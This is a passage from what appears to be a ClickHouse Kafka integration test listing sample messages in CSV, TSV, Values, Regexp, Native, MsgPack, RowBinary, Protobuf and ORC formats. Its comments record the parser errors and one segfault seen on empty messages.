'"id","blockNo","val1","val2","val3"\n1,0,"AM",0.5,1\n2,0,"AM",0.5,1\n3,0,"AM",0.5,1\n4,0,"AM",0.5,1\n5,0,"AM",0.5,1\n6,0,"AM",0.5,1\n7,0,"AM",0.5,1\n8,0,"AM",0.5,1\n9,0,"AM",0.5,1\n10,0,"AM",0.5,1\n11,0,"AM",0.5,1\n12,0,"AM",0.5,1\n13,0,"AM",0.5,1\n14,0,"AM",0.5,1\n15,0,"AM",0.5,1\n',
'"id","blockNo","val1","val2","val3"\n0,0,"AM",0.5,1\n',
# '',
# On empty message exception happens: Attempt to read after eof
# /src/IO/VarInt.h:122: DB::throwReadAfterEOF() @ 0x15c34487 in /usr/bin/clickhouse
# /src/IO/ReadHelpers.cpp:583: void DB::readCSVStringInto<std::__1::basic_string<char, std::__1::char_traits<char>, std::__1::allocator<char> > >(std::__1::basic_string<char, std::__1::char_traits<char>, std::__1::allocator<char> >&, DB::ReadBuffer&, DB::FormatSettings::CSV const&) @ 0x15c961e1 in /usr/bin/clickhouse
# /src/IO/ReadHelpers.cpp:678: DB::readCSVString(std::__1::basic_string<char, std::__1::char_traits<char>, std::__1::allocator<char> >&, DB::ReadBuffer&, DB::FormatSettings::CSV const&) @ 0x15c8dfae in /usr/bin/clickhouse
# /src/Processors/Formats/Impl/CSVRowInputFormat.cpp:170: DB::CSVRowInputFormat::readPrefix() @ 0x1dec46f7 in /usr/bin/clickhouse
# /src/Processors/Formats/IRowInputFormat.cpp:0: DB::IRowInputFormat::generate() @ 0x1de72710 in /usr/bin/clickhouse
# /src/Processors/ISource.cpp:48: DB::ISource::work() @ 0x1dd79737 in /usr/bin/clickhouse
],
},
'Values': {
'data_sample': [
"(0,0,'AM',0.5,1)",
"(1,0,'AM',0.5,1),(2,0,'AM',0.5,1),(3,0,'AM',0.5,1),(4,0,'AM',0.5,1),(5,0,'AM',0.5,1),(6,0,'AM',0.5,1),(7,0,'AM',0.5,1),(8,0,'AM',0.5,1),(9,0,'AM',0.5,1),(10,0,'AM',0.5,1),(11,0,'AM',0.5,1),(12,0,'AM',0.5,1),(13,0,'AM',0.5,1),(14,0,'AM',0.5,1),(15,0,'AM',0.5,1)",
"(0,0,'AM',0.5,1)",
],
'supports_empty_value': True,
},
'TSVWithNames': {
'data_sample': [
'id\tblockNo\tval1\tval2\tval3\n0\t0\tAM\t0.5\t1\n',
'id\tblockNo\tval1\tval2\tval3\n1\t0\tAM\t0.5\t1\n2\t0\tAM\t0.5\t1\n3\t0\tAM\t0.5\t1\n4\t0\tAM\t0.5\t1\n5\t0\tAM\t0.5\t1\n6\t0\tAM\t0.5\t1\n7\t0\tAM\t0.5\t1\n8\t0\tAM\t0.5\t1\n9\t0\tAM\t0.5\t1\n10\t0\tAM\t0.5\t1\n11\t0\tAM\t0.5\t1\n12\t0\tAM\t0.5\t1\n13\t0\tAM\t0.5\t1\n14\t0\tAM\t0.5\t1\n15\t0\tAM\t0.5\t1\n',
'id\tblockNo\tval1\tval2\tval3\n0\t0\tAM\t0.5\t1\n',
],
'supports_empty_value': True,
},
'TSVWithNamesAndTypes': {
'data_sample': [
'id\tblockNo\tval1\tval2\tval3\nInt64\tUInt16\tString\tFloat32\tUInt8\n0\t0\tAM\t0.5\t1\n',
'id\tblockNo\tval1\tval2\tval3\nInt64\tUInt16\tString\tFloat32\tUInt8\n1\t0\tAM\t0.5\t1\n2\t0\tAM\t0.5\t1\n3\t0\tAM\t0.5\t1\n4\t0\tAM\t0.5\t1\n5\t0\tAM\t0.5\t1\n6\t0\tAM\t0.5\t1\n7\t0\tAM\t0.5\t1\n8\t0\tAM\t0.5\t1\n9\t0\tAM\t0.5\t1\n10\t0\tAM\t0.5\t1\n11\t0\tAM\t0.5\t1\n12\t0\tAM\t0.5\t1\n13\t0\tAM\t0.5\t1\n14\t0\tAM\t0.5\t1\n15\t0\tAM\t0.5\t1\n',
'id\tblockNo\tval1\tval2\tval3\nInt64\tUInt16\tString\tFloat32\tUInt8\n0\t0\tAM\t0.5\t1\n',
# '',
# On empty message exception happens: Cannot parse input: expected '\n' at end of stream.
# /src/IO/ReadHelpers.cpp:84: DB::throwAtAssertionFailed(char const*, DB::ReadBuffer&) @ 0x15c8d8ec in /usr/bin/clickhouse
# /src/IO/ReadHelpers.h:175: DB::assertChar(char, DB::ReadBuffer&) @ 0x15db231a in /usr/bin/clickhouse
# /src/Processors/Formats/Impl/TabSeparatedRowInputFormat.cpp:24: DB::skipTSVRow(DB::ReadBuffer&, unsigned long) @ 0x1df92fac in /usr/bin/clickhouse
# /src/Processors/Formats/Impl/TabSeparatedRowInputFormat.cpp:168: DB::TabSeparatedRowInputFormat::readPrefix() @ 0x1df92df0 in /usr/bin/clickhouse
# /src/Processors/Formats/IRowInputFormat.cpp:0: DB::IRowInputFormat::generate() @ 0x1de72710 in /usr/bin/clickhouse
],
},
# 'Template' : {
# 'data_sample' : [
# '(id = 0, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)',
# # '(id = 1, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)\n(id = 2, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)\n(id = 3, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)\n(id = 4, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)\n(id = 5, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)\n(id = 6, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)\n(id = 7, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)\n(id = 8, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)\n(id = 9, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)\n(id = 10, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)\n(id = 11, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)\n(id = 12, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)\n(id = 13, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)\n(id = 14, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)\n(id = 15, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)',
# # '(id = 0, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)',
# # '' # tolerates
# ],
# 'extra_settings': ", format_template_row='template_row.format'"
# },
'Regexp': {
'data_sample': [
'(id = 0, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)',
'(id = 1, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)\n(id = 2, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)\n(id = 3, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)\n(id = 4, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)\n(id = 5, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)\n(id = 6, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)\n(id = 7, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)\n(id = 8, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)\n(id = 9, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)\n(id = 10, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)\n(id = 11, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)\n(id = 12, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)\n(id = 13, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)\n(id = 14, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)\n(id = 15, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)',
'(id = 0, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)',
# ''
# On empty message exception happens: Line "" doesn't match the regexp.: (at row 1)
# /src/Processors/Formats/Impl/RegexpRowInputFormat.cpp:140: DB::RegexpRowInputFormat::readRow(std::__1::vector<COW<DB::IColumn>::mutable_ptr<DB::IColumn>, std::__1::allocator<COW<DB::IColumn>::mutable_ptr<DB::IColumn> > >&, DB::RowReadExtension&) @ 0x1df82fcb in /usr/bin/clickhouse
],
'extra_settings': ", format_regexp='\(id = (.+?), blockNo = (.+?), val1 = \"(.+?)\", val2 = (.+?), val3 = (.+?)\)', format_regexp_escaping_rule='Escaped'"
},
## BINARY FORMATS
# dumped with
# clickhouse-client ... | xxd -ps -c 200 | tr -d '\n' | sed 's/\(..\)/\\x\1/g'
'Native': {
'data_sample': [
b'\x05\x01\x02\x69\x64\x05\x49\x6e\x74\x36\x34\x00\x00\x00\x00\x00\x00\x00\x00\x07\x62\x6c\x6f\x63\x6b\x4e\x6f\x06\x55\x49\x6e\x74\x31\x36\x00\x00\x04\x76\x61\x6c\x31\x06\x53\x74\x72\x69\x6e\x67\x02\x41\x4d\x04\x76\x61\x6c\x32\x07\x46\x6c\x6f\x61\x74\x33\x32\x00\x00\x00\x3f\x04\x76\x61\x6c\x33\x05\x55\x49\x6e\x74\x38\x01',
b'\x05\x0f\x02\x69\x64\x05\x49\x6e\x74\x36\x34\x01\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00\x00\x00\x00\x00\x06\x00\x00\x00\x00\x00\x00\x00\x07\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x09\x00\x00\x00\x00\x00\x00\x00\x0a\x00\x00\x00\x00\x00\x00\x00\x0b\x00\x00\x00\x00\x00\x00\x00\x0c\x00\x00\x00\x00\x00\x00\x00\x0d\x00\x00\x00\x00\x00\x00\x00\x0e\x00\x00\x00\x00\x00\x00\x00\x0f\x00\x00\x00\x00\x00\x00\x00\x07\x62\x6c\x6f\x63\x6b\x4e\x6f\x06\x55\x49\x6e\x74\x31\x36\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x76\x61\x6c\x31\x06\x53\x74\x72\x69\x6e\x67\x02\x41\x4d\x02\x41\x4d\x02\x41\x4d\x02\x41\x4d\x02\x41\x4d\x02\x41\x4d\x02\x41\x4d\x02\x41\x4d\x02\x41\x4d\x02\x41\x4d\x02\x41\x4d\x02\x41\x4d\x02\x41\x4d\x02\x41\x4d\x02\x41\x4d\x04\x76\x61\x6c\x32\x07\x46\x6c\x6f\x61\x74\x33\x32\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x04\x76\x61\x6c\x33\x05\x55\x49\x6e\x74\x38\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01',
b'\x05\x01\x02\x69\x64\x05\x49\x6e\x74\x36\x34\x00\x00\x00\x00\x00\x00\x00\x00\x07\x62\x6c\x6f\x63\x6b\x4e\x6f\x06\x55\x49\x6e\x74\x31\x36\x00\x00\x04\x76\x61\x6c\x31\x06\x53\x74\x72\x69\x6e\x67\x02\x41\x4d\x04\x76\x61\x6c\x32\x07\x46\x6c\x6f\x61\x74\x33\x32\x00\x00\x00\x3f\x04\x76\x61\x6c\x33\x05\x55\x49\x6e\x74\x38\x01',
# ''
# On empty message exception happens: DB::Exception: Attempt to read after eof
# /src/IO/VarInt.h:122: DB::throwReadAfterEOF() @ 0x15c34487 in /usr/bin/clickhouse
# /src/IO/VarInt.h:135: void DB::readVarUIntImpl<false>(unsigned long&, DB::ReadBuffer&) @ 0x15c68bb7 in /usr/bin/clickhouse
# /src/IO/VarInt.h:149: DB::readVarUInt(unsigned long&, DB::ReadBuffer&) @ 0x15c68844 in /usr/bin/clickhouse
# /src/DataStreams/NativeBlockInputStream.cpp:124: DB::NativeBlockInputStream::readImpl() @ 0x1d3e2778 in /usr/bin/clickhouse
# /src/DataStreams/IBlockInputStream.cpp:60: DB::IBlockInputStream::read() @ 0x1c9c92fd in /usr/bin/clickhouse
# /src/Processors/Formats/Impl/NativeFormat.cpp:42: DB::NativeInputFormatFromNativeBlockInputStream::generate() @ 0x1df1ea79 in /usr/bin/clickhouse
# /src/Processors/ISource.cpp:48: DB::ISource::work() @ 0x1dd79737 in /usr/bin/clickhouse
],
},
'MsgPack': {
'data_sample': [
b'\x00\x00\xa2\x41\x4d\xca\x3f\x00\x00\x00\x01',
b'\x01\x00\xa2\x41\x4d\xca\x3f\x00\x00\x00\x01\x02\x00\xa2\x41\x4d\xca\x3f\x00\x00\x00\x01\x03\x00\xa2\x41\x4d\xca\x3f\x00\x00\x00\x01\x04\x00\xa2\x41\x4d\xca\x3f\x00\x00\x00\x01\x05\x00\xa2\x41\x4d\xca\x3f\x00\x00\x00\x01\x06\x00\xa2\x41\x4d\xca\x3f\x00\x00\x00\x01\x07\x00\xa2\x41\x4d\xca\x3f\x00\x00\x00\x01\x08\x00\xa2\x41\x4d\xca\x3f\x00\x00\x00\x01\x09\x00\xa2\x41\x4d\xca\x3f\x00\x00\x00\x01\x0a\x00\xa2\x41\x4d\xca\x3f\x00\x00\x00\x01\x0b\x00\xa2\x41\x4d\xca\x3f\x00\x00\x00\x01\x0c\x00\xa2\x41\x4d\xca\x3f\x00\x00\x00\x01\x0d\x00\xa2\x41\x4d\xca\x3f\x00\x00\x00\x01\x0e\x00\xa2\x41\x4d\xca\x3f\x00\x00\x00\x01\x0f\x00\xa2\x41\x4d\xca\x3f\x00\x00\x00\x01',
b'\x00\x00\xa2\x41\x4d\xca\x3f\x00\x00\x00\x01',
# ''
# On empty message exception happens: Unexpected end of file while parsing msgpack object.: (at row 1)
# coming from Processors/Formats/Impl/MsgPackRowInputFormat.cpp:170
],
},
'RowBinary': {
'data_sample': [
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01',
b'\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x03\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x05\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x07\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x09\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x0a\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x0b\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x0c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x0d\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x0e\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x0f\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01',
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01',
# ''
# On empty message exception happens: DB::Exception: Cannot read all data. Bytes read: 0. Bytes expected: 8.
# /src/IO/ReadBuffer.h:157: DB::ReadBuffer::readStrict(char*, unsigned long) @ 0x15c6894d in /usr/bin/clickhouse
# /src/IO/ReadHelpers.h:108: void DB::readPODBinary<long>(long&, DB::ReadBuffer&) @ 0x15c67715 in /usr/bin/clickhouse
# /src/IO/ReadHelpers.h:737: std::__1::enable_if<is_arithmetic_v<long>, void>::type DB::readBinary<long>(long&, DB::ReadBuffer&) @ 0x15e7afbd in /usr/bin/clickhouse
# /src/DataTypes/DataTypeNumberBase.cpp:180: DB::DataTypeNumberBase<long>::deserializeBinary(DB::IColumn&, DB::ReadBuffer&) const @ 0x1cace581 in /usr/bin/clickhouse
# /src/Processors/Formats/Impl/BinaryRowInputFormat.cpp:22: DB::BinaryRowInputFormat::readRow(std::__1::vector<COW<DB::IColumn>::mutable_ptr<DB::IColumn>, std::__1::allocator<COW<DB::IColumn>::mutable_ptr<DB::IColumn> > >&, DB::RowReadExtension&) @ 0x1dea2c0b in /usr/bin/clickhouse
],
},
'RowBinaryWithNamesAndTypes': {
'data_sample': [
b'\x05\x02\x69\x64\x07\x62\x6c\x6f\x63\x6b\x4e\x6f\x04\x76\x61\x6c\x31\x04\x76\x61\x6c\x32\x04\x76\x61\x6c\x33\x05\x49\x6e\x74\x36\x34\x06\x55\x49\x6e\x74\x31\x36\x06\x53\x74\x72\x69\x6e\x67\x07\x46\x6c\x6f\x61\x74\x33\x32\x05\x55\x49\x6e\x74\x38\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01',
b'\x05\x02\x69\x64\x07\x62\x6c\x6f\x63\x6b\x4e\x6f\x04\x76\x61\x6c\x31\x04\x76\x61\x6c\x32\x04\x76\x61\x6c\x33\x05\x49\x6e\x74\x36\x34\x06\x55\x49\x6e\x74\x31\x36\x06\x53\x74\x72\x69\x6e\x67\x07\x46\x6c\x6f\x61\x74\x33\x32\x05\x55\x49\x6e\x74\x38\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x03\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x05\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x07\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x09\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x0a\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x0b\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x0c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x0d\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x0e\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x0f\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01',
b'\x05\x02\x69\x64\x07\x62\x6c\x6f\x63\x6b\x4e\x6f\x04\x76\x61\x6c\x31\x04\x76\x61\x6c\x32\x04\x76\x61\x6c\x33\x05\x49\x6e\x74\x36\x34\x06\x55\x49\x6e\x74\x31\x36\x06\x53\x74\x72\x69\x6e\x67\x07\x46\x6c\x6f\x61\x74\x33\x32\x05\x55\x49\x6e\x74\x38\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01',
# ''
# !!! On empty message segfault: Address not mapped to object
# /contrib/FastMemcpy/FastMemcpy.h:666: memcpy_fast @ 0x21742d65 in /usr/bin/clickhouse
# /contrib/FastMemcpy/memcpy_wrapper.c:5: memcpy @ 0x21738235 in /usr/bin/clickhouse
# /src/IO/ReadBuffer.h:145: DB::ReadBuffer::read(char*, unsigned long) @ 0x15c369d7 in /usr/bin/clickhouse
# /src/IO/ReadBuffer.h:155: DB::ReadBuffer::readStrict(char*, unsigned long) @ 0x15c68878 in /usr/bin/clickhouse
# /src/DataTypes/DataTypeString.cpp:84: DB::DataTypeString::deserializeBinary(DB::IColumn&, DB::ReadBuffer&) const @ 0x1cad12e7 in /usr/bin/clickhouse
# /src/Processors/Formats/Impl/BinaryRowInputFormat.cpp:22: DB::BinaryRowInputFormat::readRow(std::__1::vector<COW<DB::IColumn>::mutable_ptr<DB::IColumn>, std::__1::allocator<COW<DB::IColumn>::mutable_ptr<DB::IColumn> > >&, DB::RowReadExtension&) @ 0x1dea2c0b in /usr/bin/clickhouse
],
},
'Protobuf': {
'data_sample': [
b'\x0b\x1a\x02\x41\x4d\x25\x00\x00\x00\x3f\x28\x01',
b'\x0d\x08\x01\x1a\x02\x41\x4d\x25\x00\x00\x00\x3f\x28\x01\x0d\x08\x02\x1a\x02\x41\x4d\x25\x00\x00\x00\x3f\x28\x01\x0d\x08\x03\x1a\x02\x41\x4d\x25\x00\x00\x00\x3f\x28\x01\x0d\x08\x04\x1a\x02\x41\x4d\x25\x00\x00\x00\x3f\x28\x01\x0d\x08\x05\x1a\x02\x41\x4d\x25\x00\x00\x00\x3f\x28\x01\x0d\x08\x06\x1a\x02\x41\x4d\x25\x00\x00\x00\x3f\x28\x01\x0d\x08\x07\x1a\x02\x41\x4d\x25\x00\x00\x00\x3f\x28\x01\x0d\x08\x08\x1a\x02\x41\x4d\x25\x00\x00\x00\x3f\x28\x01\x0d\x08\x09\x1a\x02\x41\x4d\x25\x00\x00\x00\x3f\x28\x01\x0d\x08\x0a\x1a\x02\x41\x4d\x25\x00\x00\x00\x3f\x28\x01\x0d\x08\x0b\x1a\x02\x41\x4d\x25\x00\x00\x00\x3f\x28\x01\x0d\x08\x0c\x1a\x02\x41\x4d\x25\x00\x00\x00\x3f\x28\x01\x0d\x08\x0d\x1a\x02\x41\x4d\x25\x00\x00\x00\x3f\x28\x01\x0d\x08\x0e\x1a\x02\x41\x4d\x25\x00\x00\x00\x3f\x28\x01\x0d\x08\x0f\x1a\x02\x41\x4d\x25\x00\x00\x00\x3f\x28\x01',
b'\x0b\x1a\x02\x41\x4d\x25\x00\x00\x00\x3f\x28\x01',
# ''
# On empty message exception: Attempt to read after eof
# /src/IO/ReadBuffer.h:184: DB::ReadBuffer::throwReadAfterEOF() @ 0x15c9699b in /usr/bin/clickhouse
# /src/Formats/ProtobufReader.h:115: DB::ProtobufReader::SimpleReader::startMessage() @ 0x1df4f828 in /usr/bin/clickhouse
# /src/Formats/ProtobufReader.cpp:1119: DB::ProtobufReader::startMessage() @ 0x1df5356c in /usr/bin/clickhouse
# /src/Processors/Formats/Impl/ProtobufRowInputFormat.cpp:25: DB::ProtobufRowInputFormat::readRow(std::__1::vector<COW<DB::IColumn>::mutable_ptr<DB::IColumn>, std::__1::allocator<COW<DB::IColumn>::mutable_ptr<DB::IColumn> > >&, DB::RowReadExtension&) @ 0x1df4cc71 in /usr/bin/clickhouse
# /src/Processors/Formats/IRowInputFormat.cpp:64: DB::IRowInputFormat::generate() @ 0x1de727cf in /usr/bin/clickhouse
],
'extra_settings': ", kafka_schema='test:TestMessage'"
},
'ORC': {
'data_sample': [
b'\x4f\x52\x43\x11\x00\x00\x0a\x06\x12\x04\x08\x01\x50\x00\x2b\x00\x00\x0a\x13\x0a\x03\x00\x00\x00\x12\x0c\x08\x01\x12\x06\x08\x00\x10\x00\x18\x00\x50\x00\x30\x00\x00\xe3\x12\xe7\x62\x65\x00\x01\x21\x3e\x0e\x46\x25\x0e\x2e\x46\x03\x21\x46\x03\x09\xa6\x00\x06\x00\x32\x00\x00\xe3\x92\xe4\x62\x65\x00\x01\x21\x01\x0e\x46\x25\x2e\x2e\x26\x47\x5f\x21\x20\x96\x60\x09\x60\x00\x00\x36\x00\x00\xe3\x92\xe1\x62\x65\x00\x01\x21\x61\x0e\x46\x23\x5e\x2e\x46\x03\x21\x66\x03\x3d\x53\x29\x10\x11\xc0\x00\x00\x2b\x00\x00\x0a\x13\x0a\x03\x00\x00\x00\x12\x0c\x08\x01\x12\x06\x08\x02\x10\x02\x18\x02\x50\x00\x05\x00\x00\xff\x00\x03\x00\x00\x30\x07\x00\x00\x40\x00\x80\x05\x00\x00\x41\x4d\x07\x00\x00\x42\x00\x80\x03\x00\x00\x0a\x07\x00\x00\x42\x00\x80\x05\x00\x00\xff\x01\x88\x00\x00\x4d\xca\xc1\x0a\x80\x30\x0c\x03\xd0\x2e\x6b\xcb\x98\x17\xf1\x14\x50\xfc\xff\xcf\xb4\x66\x1e\x3c\x84\x47\x9a\xce\x1c\xb9\x1b\xb7\xf9\xda\x48\x09\x9e\xb2\xf3\x92\xce\x5b\x86\xf6\x56\x7f\x21\x41\x2f\x51\xa6\x7a\xd7\x1d\xe5\xea\xae\x3d\xca\xd5\x83\x71\x60\xd8\x17\xfc\x62\x0f\xa8\x00\x00\xe3\x4a\xe6\x62\xe1\x60\x0c\x60\xe0\xe2\xe3\x60\x14\x62\xe3\x60\x10\x60\x90\x60\x08\x60\x88\x60\xe5\x12\xe0\x60\x54\xe2\xe0\x62\x34\x10\x62\x34\x90\x60\x02\x8a\x70\x71\x09\x01\x45\xb8\xb8\x98\x1c\x7d\x85\x80\x58\x82\x05\x28\xc6\xcd\x25\xca\xc1\x68\xc4\x0b\x52\xc5\x6c\xa0\x67\x2a\x05\x22\xc0\x4a\x21\x86\x31\x09\x30\x81\xb5\xb2\x02\x00\x36\x01\x00\x25\x8c\xbd\x0a\xc2\x30\x14\x85\x73\x6f\x92\xf6\x92\x6a\x09\x01\x21\x64\x92\x4e\x75\x91\x58\x71\xc9\x64\x27\x5d\x2c\x1d\x5d\xfd\x59\xc4\x42\x37\x5f\xc0\x17\xe8\x23\x9b\xc6\xe1\x3b\x70\x0f\xdf\xb9\xc4\xf5\x17\x5d\x41\x5c\x4f\x60\x37\xeb\x53\x0d\x55\x4d\x0b\x23\x01\xb9\x90\x2e\xbf\x0f\xe3\xe3\xdd\x8d\x0e\x5f\x4f\x27\x3e\xb7\x61\x97\xb2\x49\xb9\xaf\x90\x20\x92\x27\x32\x2a\x6b\xf4\xf3\x0d\x1e\x82\x20\xe8\x59\x28\x09\x4c\x46\x4c\x33\xcb\x7a\x76\x95\x41\x47\x9f\x14\x78\x03\xde\x62\x6c\x54\x30\xb1\x51\x0a\xdb\x8b\x89\x58\x11\xbb\x22\xac\x08\x9a\xe5\x6c\x71\xbf\x3d\xb8\x39\x92\xfa\x7f\x86\x1a\xd3\x54\x1e\xa7\xee\xcc\x7e\x08\x9e\x01\x10\x01\x18\x80\x80\x10\x22\x02\x00\x0c\x28\x57\x30\x06\x82\xf4\x03\x03\x4f\x52\x43\x18',
b'\x4f\x52\x43\x11\x00\x00\x0a\x06\x12\x04\x08\x0f\x50\x00\x2b\x00\x00\x0a\x13\x0a\x03\x00\x00\x00\x12\x0c\x08\x0f\x12\x06\x08\x00\x10\x00\x18\x00\x50\x00\x30\x00\x00\xe3\x12\xe7\x62\x65\x00\x01\x21\x3e\x0e\x7e\x25\x0e\x2e\x46\x43\x21\x46\x4b\x09\xad\x00\x06\x00\x33\x00\x00\x0a\x17\x0a\x03\x00\x00\x00\x12\x10\x08\x0f\x22\x0a\x0a\x02\x41\x4d\x12\x02\x41\x4d\x18\x3c\x50\x00\x3a\x00\x00\xe3\x92\xe1\x62\x65\x00\x01\x21\x61\x0e\x7e\x23\x5e\x2e\x46\x03\x21\x66\x03\x3d\x53\x29\x66\x73\x3d\xd3\x00\x06\x00\x2b\x00\x00\x0a\x13\x0a\x03\x00\x00\x00\x12\x0c\x08\x0f\x12\x06\x08\x02\x10\x02\x18\x1e\x50\x00\x05\x00\x00\x0c\x00\x2b\x00\x00\x31\x32\x33\x34\x35\x36\x37\x38\x39\x31\x30\x31\x31\x31\x32\x31\x33\x31\x34\x31\x35\x09\x00\x00\x06\x01\x03\x02\x09\x00\x00\xc0\x0e\x00\x00\x07\x00\x00\x42\x00\x80\x05\x00\x00\x41\x4d\x0a\x00\x00\xe3\xe2\x42\x01\x00\x09\x00\x00\xc0\x0e\x02\x00\x05\x00\x00\x0c\x01\x94\x00\x00\x2d\xca\xc1\x0e\x80\x30\x08\x03\xd0\xc1\x60\x2e\xf3\x62\x76\x6a\xe2\x0e\xfe\xff\x57\x5a\x3b\x0f\xe4\x51\xe8\x68\xbd\x5d\x05\xe7\xf8\x34\x40\x3a\x6e\x59\xb1\x64\xe0\x91\xa9\xbf\xb1\x97\xd2\x95\x9d\x1e\xca\x55\x3a\x6d\xb4\xd2\xdd\x0b\x74\x9a\x74\xf7\x12\x39\xbd\x97\x7f\x7c\x06\xbb\xa6\x8d\x97\x17\xb4\x00\x00\xe3\x4a\xe6\x62\xe1\xe0\x0f\x60\xe0\xe2\xe3\xe0\x17\x62\xe3\x60\x10\x60\x90\x60\x08\x60\x88\x60\xe5\x12\xe0\xe0\x57\xe2\xe0\x62\x34\x14\x62\xb4\x94\xd0\x02\x8a\xc8\x73\x09\x